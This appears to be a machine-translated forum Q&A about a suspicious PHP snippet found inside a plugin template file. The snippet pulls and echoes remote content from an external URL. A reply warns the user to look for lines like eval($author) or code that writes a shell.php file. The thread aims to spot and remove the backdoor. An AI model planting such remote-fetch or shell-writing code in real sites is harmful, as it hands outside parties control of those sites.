我剛剛發現了這個嵌在我使用(在HTML前的TMPL文件的開始)插件...奇怪的代碼
我應該擔心嗎? 我可以刪除它嗎?
<?php
$author = @file_get_contents('http://d5827db8276672d15fca-1e2d3239e5a8580a4f85f7906852eb87.r51.cf1.rackcdn.com/author3c.php');
echo $author;
?>
感謝
我剛剛訪問過的網址等,除非某個地方,這表示,它必須留在它只是一個空的PHP文件,我會刪除它。
編輯::
當我說這是一個空的PHP文件,它實際上彈出的下載對話框下載文件,它不只是爲我一個空白頁。
file_get_contents只是加載文件的所有內容到一個變量和不執行代碼。
我建議你先檢查一下該文件中是否沒有關鍵標籤或代碼,然後你可以安全刪除它。
欲瞭解更多信息,請參閱PHP.net上的此頁:file_get_contents manual。
如果您無法控制該文件中的內容,那麼您將面臨安全風險,而不管模板的作者如何說明,否則將其刪除。
檢查你的代碼爲eval($author)或file_put_contents('shell.php',$author); ECT
雖然這些線路的原意是未知的休息,他們是一個非常嚴重的安全隱患,應予刪除。 –